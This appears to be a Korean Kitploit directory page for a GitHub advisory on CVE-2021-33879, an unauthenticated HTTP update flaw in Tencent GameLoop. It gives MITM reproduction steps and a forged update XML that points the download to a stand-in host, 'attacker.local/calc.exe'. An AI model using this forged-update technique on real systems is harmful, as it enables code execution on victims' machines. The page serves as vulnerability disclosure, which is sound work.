Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2021-33879 — GameLoop 업데이트 MITM | Kitploit
도구/GitHubGitHub/mmiszczyk/cve-2021-33879
Vulnerability AnalysisExploitationWeb Application ExploitationMalware AnalysisPenetration TestingSupply Chain Security
GitHubmmiszczyk/cve-2021-33879

cve-2021-33879

GameLoop 업데이트 MITM

저장소 보기
15년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVEID: CVE-2021-33879

영향을 받는 제품 및 버전: GameLoop (4.1.21.90 이전의 모든 버전)

취약점 유형: CWE-494: 무결성 검사 없는 코드 다운로드


요약

GameLoop는 Tencent가 개발한 Android 에뮬레이터입니다. 이 에뮬레이터에는 암호화되거나 인증되지 않은 업데이트 메커니즘이 있습니다(이 공격에서 공격자가 제어할 수 있는 MD5 해시로만 보호됨). 따라서 MITM 위치에 있는 공격자가 업데이트 패키지를 가로채고 자신의 업데이트 패키지를 보내 피해자 머신에서 실행되게 할 수 있습니다.

설명

4.1.21.90 이전의 Tencent GameLoop는 안전하지 않은 HTTP 연결을 통해 업데이트를 다운로드했습니다. MITM 위치에 있는 악의적인 공격자는 업데이트 패키지를 설명하는 XML 문서의 내용을 위조하여 다운로드 URL을 임의의 Windows 실행 파일을 가리키는 URL로 교체할 수 있습니다. 유일한 무결성 검사는 다운로드한 파일의 MD5 체크섬을 XML 문서에 포함된 체크섬과 비교하는 것이기 때문에, 다운로드된 실행 파일은 피해자 머신에서 실행됩니다.

재현

  • 공격자 환경 구성:
    • 웹서버를 설정하고, 그 위에 실행 파일 페이로드를 올린 후 MD5 해시를 계산합니다.
    • 프록시를 설정하고 ComponentUpdate.xml에 대한 요청을 가로채도록 구성합니다.
  • 피해자 환경 구성:
    • 인터넷 연결이 공격자의 프록시를 통과하도록 구성합니다.
    • 취약한 버전의 GameLoop를 설치합니다.
  • 피해자: 업데이트 확인 강제
    • GameLoop를 실행합니다.
    • 햄버거 메뉴에서 'Update'를 클릭합니다.
  • 공격자: ComponentUpdate.xml 수정 (페이로드에 맞는 url, md5 및 filesize 입력)
root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<UpdateConfig>
	<GlobalConfig>
		<Item name="UpdateEnable" Value="1" />
	</GlobalConfig>
	<UpdatePolicy>
		<PolicyItem id="1" Enable="1" AutoUpdateRate="1" ManualUpdateRate="100" MatchUpdateOperation="2" Weight="4">
			<Condition Method="Or">
				<MatchSupplyId Type="market" MatchResult="0" Start="3.10.199.100" End="4.99.999.999" />
			</Condition>
		</PolicyItem>
	</UpdatePolicy>
	<UpdateOperation>
		<OperItem id="2" inherit="0" Desc="This is a malicious update" Title="Malicious update" text="I could serve you ransomware but I'll just spawn calc">
			<Item Type="market" url="http://attacker.local/calc.exe" md5="c4cb4fdf6369dd1342d2666171866ce5" version="5.10.199.100" filesize="32768" />
		</OperItem>
	</UpdateOperation>
</UpdateConfig>
  • 피해자: 'Update Now' 클릭

업데이트 프롬프트

  • 공격자의 페이로드가 이제 피해자 머신에서 실행됩니다.

페이로드 실행됨

해결 방법

최신 버전의 GameLoop를 설치하십시오.

도구 다운로드